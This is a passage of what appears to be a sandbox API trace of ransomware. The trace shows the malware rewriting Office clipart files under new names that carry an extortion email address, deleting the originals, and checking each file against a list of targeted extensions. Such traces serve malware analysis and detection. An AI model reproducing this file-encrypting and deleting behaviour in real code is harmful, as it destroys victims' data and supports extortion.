hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.230] SetEndOfFile (hFile=0x2c8) returned 1 [0068.231] CloseHandle (hObject=0x2c8) returned 1 [0068.231] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.231] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00685_.wmf")) returned 1 [0068.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 68 [0068.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 68 [0068.232] lstrlenW (lpString=".doc") returned 4 [0068.236] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.236] lstrlenW (lpString=".docx") returned 5 [0068.236] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.236] lstrlenW (lpString=".pdf") returned 4 [0068.236] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.236] lstrlenW (lpString=".xls") returned 4 [0068.237] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.237] lstrlenW (lpString=".xlsx") returned 5 [0068.237] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.237] lstrlenW (lpString=".ppt") returned 4 [0068.237] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 68 [0068.237] lstrlenW (lpString=".zip") returned 4 [0068.237] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.237] lstrlenW (lpString=".rar") returned 4 [0068.237] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.237] lstrlenW (lpString=".bz2") returned 4 [0068.237] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.237] lstrlenW (lpString=".7z") returned 3 [0068.237] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 68 [0068.237] lstrlenW (lpString=".dbf") returned 4 [0068.237] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 68 [0068.237] lstrlenW (lpString=".1cd") returned 4 [0068.237] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 68 [0068.237] lstrlenW (lpString=".jpg") returned 4 [0068.237] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.243] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.243] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01291_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.244] GetLastError () returned 0x0 [0068.244] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x3dbe, lpOverlapped=0x0) returned 1 [0068.251] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x3dc0, lpOverlapped=0x0) returned 1 [0068.252] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.252] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.252] SetEndOfFile (hFile=0x354) returned 1 [0068.252] CloseHandle (hObject=0x354) returned 1 [0068.252] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.252] SetEndOfFile (hFile=0x2c8) returned 1 [0068.253] CloseHandle (hObject=0x2c8) returned 1 [0068.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.253] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01291_.wmf")) returned 1 [0068.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 68 [0068.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 68 [0068.254] lstrlenW (lpString=".doc") returned 4 [0068.254] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.254] lstrlenW (lpString=".docx") returned 5 [0068.254] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.254] lstrlenW (lpString=".pdf") returned 4 [0068.254] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.254] lstrlenW (lpString=".xls") returned 4 [0068.254] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.254] lstrlenW (lpString=".xlsx") returned 5 [0068.254] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.254] lstrlenW (lpString=".ppt") returned 4 [0068.254] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 68 [0068.254] lstrlenW (lpString=".zip") returned 4 [0068.254] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.254] lstrlenW (lpString=".rar") returned 4 [0068.254] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.254] lstrlenW (lpString=".bz2") returned 4 [0068.254] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.254] lstrlenW (lpString=".7z") returned 3 [0068.254] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 68 [0068.254] lstrlenW (lpString=".dbf") returned 4 [0068.254] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 68 [0068.254] lstrlenW (lpString=".1cd") returned 4 [0068.254] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 68 [0068.255] lstrlenW (lpString=".jpg") returned 4 [0068.255] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.255] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.255] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01461_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.255] GetLastError () returned 0x0 [0068.255] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1746, lpOverlapped=0x0) returned 1 [0068.313] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1750, lpOverlapped=0x0) returned 1 [0068.314] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.314] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.314] SetEndOfFile (hFile=0x354) returned 1 [0068.315] CloseHandle (hObject=0x354) returned 1 [0068.315] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.315] SetEndOfFile (hFile=0x2c8) returned 1 [0068.315] CloseHandle (hObject=0x2c8) returned 1 [0068.315] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.316] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01461_.wmf")) returned 1 [0068.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 68 [0068.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 68 [0068.316] lstrlenW (lpString=".doc") returned 4 [0068.316] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.316] lstrlenW (lpString=".docx") returned 5 [0068.316] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.316] lstrlenW (lpString=".pdf") returned 4 [0068.316] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.316] lstrlenW (lpString=".xls") returned 4 [0068.316] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.316] lstrlenW (lpString=".xlsx") returned 5 [0068.316] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.316] lstrlenW (lpString=".ppt") returned 4 [0068.316] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 68 [0068.316] lstrlenW (lpString=".zip") returned 4 [0068.316] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.317] lstrlenW (lpString=".rar") returned 4 [0068.317] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.317] lstrlenW (lpString=".bz2") returned 4 [0068.317] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.317] lstrlenW (lpString=".7z") returned 3 [0068.317] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 68 [0068.317] lstrlenW (lpString=".dbf") returned 4 [0068.317] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 68 [0068.317] lstrlenW (lpString=".1cd") returned 4 [0068.317] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 68 [0068.317] lstrlenW (lpString=".jpg") returned 4 [0068.317] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.317] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.317] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02155_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.318] GetLastError () returned 0x0 [0068.318] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xa90, lpOverlapped=0x0) returned 1 [0068.320] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xaa0, lpOverlapped=0x0) returned 1 [0068.321] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.321] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.321] SetEndOfFile (hFile=0x354) returned 1 [0068.321] CloseHandle (hObject=0x354) returned 1 [0068.321] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.321] SetEndOfFile (hFile=0x2c8) returned 1 [0068.322] CloseHandle (hObject=0x2c8) returned 1 [0068.322] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.322] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02155_.wmf")) returned 1 [0068.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 68 [0068.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 68 [0068.322] lstrlenW (lpString=".doc") returned 4 [0068.322] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.322] lstrlenW (lpString=".docx") returned 5 [0068.322] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.323] lstrlenW (lpString=".pdf") returned 4 [0068.323] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.323] lstrlenW (lpString=".xls") returned 4 [0068.323] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.323] lstrlenW (lpString=".xlsx") returned 5 [0068.323] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.323] lstrlenW (lpString=".ppt") returned 4 [0068.323] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 68 [0068.323] lstrlenW (lpString=".zip") returned 4 [0068.323] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.323] lstrlenW (lpString=".rar") returned 4 [0068.323] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.323] lstrlenW (lpString=".bz2") returned 4 [0068.323] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.323] lstrlenW (lpString=".7z") returned 3 [0068.323] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 68 [0068.323] lstrlenW (lpString=".dbf") returned 4 [0068.323] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 68 [0068.323] lstrlenW (lpString=".1cd") returned 4 [0068.323] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 68 [0068.323] lstrlenW (lpString=".jpg") returned 4 [0068.323] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.324] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.324] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02166_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.324] GetLastError () returned 0x0 [0068.324] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x52c, lpOverlapped=0x0) returned 1 [0068.329] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x530, lpOverlapped=0x0) returned 1 [0068.330] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.330] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.330] SetEndOfFile (hFile=0x354) returned 1 [0068.330] CloseHandle (hObject=0x354) returned 1 [0068.330] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.330] SetEndOfFile (hFile=0x2c8) returned 1 [0068.331] CloseHandle (hObject=0x2c8) returned 1 [0068.331] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.331] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02166_.wmf")) returned 1 [0068.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 68 [0068.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 68 [0068.332] lstrlenW (lpString=".doc") returned 4 [0068.332] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.332] lstrlenW (lpString=".docx") returned 5 [0068.332] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.332] lstrlenW (lpString=".pdf") returned 4 [0068.332] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.332] lstrlenW (lpString=".xls") returned 4 [0068.332] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.332] lstrlenW (lpString=".xlsx") returned 5 [0068.332] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.332] lstrlenW (lpString=".ppt") returned 4 [0068.332] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 68 [0068.332] lstrlenW (lpString=".zip") returned 4 [0068.332] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.332] lstrlenW (lpString=".rar") returned 4 [0068.332] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.332] lstrlenW (lpString=".bz2") returned 4 [0068.333] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.333] lstrlenW (lpString=".7z") returned 3 [0068.333] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 68 [0068.333] lstrlenW (lpString=".dbf") returned 4 [0068.333] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 68 [0068.333] lstrlenW (lpString=".1cd") returned 4 [0068.333] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 68 [0068.333] lstrlenW (lpString=".jpg") returned 4 [0068.333] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.333] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.333] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02282_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.334] GetLastError () returned 0x0 [0068.334] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1efc, lpOverlapped=0x0) returned 1 [0068.340] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1f00, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1f00, lpOverlapped=0x0) returned 1 [0068.341] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.341] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.341] SetEndOfFile (hFile=0x354) returned 1 [0068.342] CloseHandle (hObject=0x354) returned 1 [0068.342] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.342] SetEndOfFile (hFile=0x2c8) returned 1 [0068.345] CloseHandle (hObject=0x2c8) returned 1 [0068.345] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.346] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02282_.wmf")) returned 1 [0068.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 68 [0068.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 68 [0068.346] lstrlenW (lpString=".doc") returned 4 [0068.346] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.346] lstrlenW (lpString=".docx") returned 5 [0068.346] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.346] lstrlenW (lpString=".pdf") returned 4 [0068.346] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.346] lstrlenW (lpString=".xls") returned 4 [0068.346] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.346] lstrlenW (lpString=".xlsx") returned 5 [0068.346] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.346] lstrlenW (lpString=".ppt") returned 4 [0068.346] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 68 [0068.347] lstrlenW (lpString=".zip") returned 4 [0068.347] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.347] lstrlenW (lpString=".rar") returned 4 [0068.347] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.347] lstrlenW (lpString=".bz2") returned 4 [0068.347] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.347] 